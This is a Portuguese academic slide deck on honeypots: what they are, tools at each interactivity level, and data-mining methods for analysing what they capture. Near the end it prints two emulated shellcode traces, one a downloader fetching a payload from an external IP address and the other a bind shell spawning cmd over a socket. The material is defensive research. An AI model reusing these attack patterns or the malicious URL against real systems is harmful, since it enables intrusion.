Honeypots: o que são, para que servem e como extrair informações

UNIVERSIDADE PRESBITERIANA MACKENZIE
Programa de Pós Graduação em Engenharia Elétrica
Laboratório de Computação Natural - LCoN
Honeypots: o que são, para que servem e
como extrair informações
Pedro H. Matheus
phmatheus@msn.com

UNIVERSIDADE PRESBITERIANA MACKENZIE
Programa de Pós Graduação em Engenharia Elétrica
Laboratório de Computação Natural - LCoN
• Agenda
• O que são Honeypots
• Para que servem
• Que informações podem ser extraídas ?

3Setembro / 2013phmatheus@msn.com
Honeypot

• Honeypots são sistemas computacionais cujo
objetivo é ter falhas de segurança para serem
atacadas e exploradas
O que são Honeypots

• Baixa Interatividade
• Média Interatividade
• Alta Interatividade
Honeypot

• Honeyd
– É um pequeno programa que cria hosts virtuais na
rede, os hosts podem ser configurados para executar
serviços arbitrarios, a suas caracteristicas podem ser
adaptadas para simularem certos sistemas
operacionais.
• SpamTrap
– É um servidor de e-mail criado não para comunicação
de e-mails mas, para ser explorado por spammers
para enviar e-mails, esse servidor não encaminha o e-
mail enviado para o destinatário, apenas armazena o
e-mail para analise posterior.
Baixa Interatividade

• Dionaea
É uma evolução do Nepentes com suporte a IPV6
e um novo meio de se ampliar a base de
conhecimento que anteriormente era escrita em
c++ agora é escrita em python possibilitando que
uma gama maior de programadores criem e
expandam a base de conhecimento conforme
suas necessidades.
Média Interatividade
• Nepenthes
Nepenthes emula as vulnerabilidades para a coleta de
informações sobre potenciais ataques é utilizado uma base de
conhecimento sobre as falhas para interagir com
os atacantes, com o objetivo de obter o artefato malicioso.

• Kippo
– Honeypot que simula o serviço de ssh, coletando
informações de ataques de brute-force, e
posteriormente os comandos enviados pelo
atacante.
https://code.google.com/p/kippo/
Média Interatividade

• Qebek
– Modificação do QEMU para monitorar todas as
chamadas de sistema do Windows, permitindo
analisar, depurar e monitorar a execução de ataques e
de artefatos maliciosos.
• Sebek
– É um modulo do kernel instalado no Windows com o
proposito de coletar informações sobre os artefatos
maliciosos e os ataques contra os sistemas, ele
permite a coleta de informações desde as teclas
pressionadas até informações criptografadas.
Alta Interatividade

O Fluxo de um ataque
Atacante Honeypot
File System
Base de Dados
Binarios
BitStream
Sniffer

• Uso dos dados de rede bruto para extração de
informações
• Estatística (Cukier et al. 2006)
• Associação (Ohrui et al. 2010)
• Agrupamento (Ghourabi et al. 2010)
• Correlação com SVM (Song et al. 2011)
• Longest Common Substring (Thakar et al. 2005)
• Redes Neurais MLP e KNN (Grégio et al. 2007)
Extração de informação de Honeypots

• O que todos esses trabalhos trazem em
comum é que utilizam os dados de rede para
gerar as estatísticas, para efetuar o
agrupamento, para criar as assinaturas e os
padrões dos detectores de intrusão.
Extração de informação de Honeypots

Que informações podem ser extraídas ?
Base de Dados

Binarios

BitStream

[
{
"call": "LoadLibraryA",
"args" : [
"urlmon"
],
"return" : "0x7df20000"
},
{
"call": "URLDownloadToFile",
"args" : [
"",
"http://189.29.132.79:6402/dkqc",
"x.",
"0",
"0"
],
"return": "0"
},
{
"args" : [
"x."
],
"return" :
"0x00000000"
},
{
"call": "ExitThread",
"args" : [
"0"
],
"return": "0"
}
]

[
{
"call": "GetProcAddress",
"args" : [
"",
"CreateProcessA"
],
"return" : "0x7c802367"
},
{
"args" : [
"",
"ExitThread"
],
"return" : "0x7c80c058"
},
{
"args" : [
"",
"LoadLibraryA"
],
"return" : "0x7c801d77"
},
{
"args" : [
"ws2_32"
],
"return" : "0x71a10000"
},

{
"args" : [
"",
"WSASocketA"
],
"return" : "0x71a18769"
},
{
"args" : [
"",
"bind"
],
"return" : "0x71a13e00"
},
{
"args" : [
"",
"listen"
],
"return" : "0x71a188d3"
},
{
"args" : [
"",
"accept"
],
"return" : "0x71a21028"
},

{
"args" : [
"",
"closesocket"
],
"return" : "0x71a19639"
},
{
"call": "WSASocket",
"args" : [
"2",
"1",
"0",
"0",
"0",
"0"
],
"return": "66"
},
{
"call": "bind",
"args" : [
"66",
{
"sin_family" : "2",
"sin_port" : "12045",
"sin_addr" : {
"s_addr" : "0.0.0.0"
},
"sin_zero" : " "
},
"16"
],
"return": "0"
},

{
"call": "listen",
"args" : [
"66",
"1"
],
"return": "0"
},
{
"call": "accept",
"args" : [
"66",
{
},
""
],
"return": "68"
},
{
"call": "CreateProcess",
"args" : "", "cmd", "", "","1","0", "", "",
{
"cb" : "0",
"lpReserved" : "0",
"lpDesktop" : "0",
"lpTitle" : "0",
"dwX" : "0",
"dwY" : "0",
"dwXSize" : "0",
"dwYSize" : "0",
"dwXCountChars" : "0",
"dwYCountChars" : "0",
"dwFillAttribute" : "0",
"dwFlags" : "0",
"wShowWindow" : "0",
"cbReserved2" : "0",
"lpReserved2" : "0",
"hStdInput" : "68",
"hStdOutput" : "68",
"hStdError" : "68"
},

{
"hProcess" : "4711",
"hThread" : "4712",
"dwProcessId" : "4712",
"dwThreadId" : "4714"
}
],
"return": "-1"
},
{
"call": "closesocket",
"args" : [
"68"
],
"return": "0"
},
{
"call": "closesocket",
"args" : [
"66"
],
"return": "0"
},
{
"call": "ExitThread",
"args" : [
"0"
],
"return": "0"
}
]

Dúvidas

• M. Cukier, R. Berthier, S. Panjwani, and S. Tan, “A statistical analysis of attack data to separate
attacks,” in Dependable Systems and Networks, 2006. DSN 2006. International Conference on,
2006, pp. 383–392.
• M. Ohrui, H. Kikuchi, and M. Terada, “Mining association rules consisting of download servers from
distributed honeypot observation,” in Network-Based Information Systems (NBiS), 2010 13th
International Conference on, 2010, pp. 541–545.
• X. Tang, “The generation of attack signatures based on virtual honeypots,” in Parallel and
Distributed Computing, Applications and Technologies (PDCAT), 2010 International Conference on,
2010, pp. 435–439.
• A. Ghourabi, T. Abbes, and A. Bouhoula, “Data analyzer based on data mining for honeypot router,”
in Computer Systems and Applications (AICCSA), 2010 IEEE/ACS International Conference on, 2010,
pp. 1–6.
• J. Song, H. Takakura, Y. Okabe, and Y. Kwon, “Correlation analysis between honeypot data and ids
alerts using one-class svm,” Intrusion Detection Systems, In Tech, pp. 173–193, 2011.
• U. Thakar, S. Varma, and A. Ramani, “Honeyanalyzer–analysis and extraction of intrusion detection
patterns & signatures using honeypot,” in Proceedings of the Second International Conference on
Innovations in Information Technology, 2005.
• A. Grégio, R. Santos, and A. Montes, “Evaluation of data mining techniques for suspicious network
activity classification using honeypots data,” in Defense and Security Symposium. International
Society for Optics and Photonics, 2007, pp. 657 006–657 006.
• S. Kaiser, “Biclustering: Methods, Software and Application”, Munchen 2011, Disponível em:
http://edoc.ub.uni-muenchen.de/13073/1/Kaiser_Sebastian.pdf
Referências

Honeypots: o que são, para que servem e como extrair informações

Recomendados

Recomendados

Mais conteúdo relacionado

Semelhante a Honeypots: o que são, para que servem e como extrair informações

Semelhante a Honeypots: o que são, para que servem e como extrair informações (20)

Mais de LCoN Mackenzie

Mais de LCoN Mackenzie (7)

Último

Último (20)

Honeypots: o que são, para que servem e como extrair informações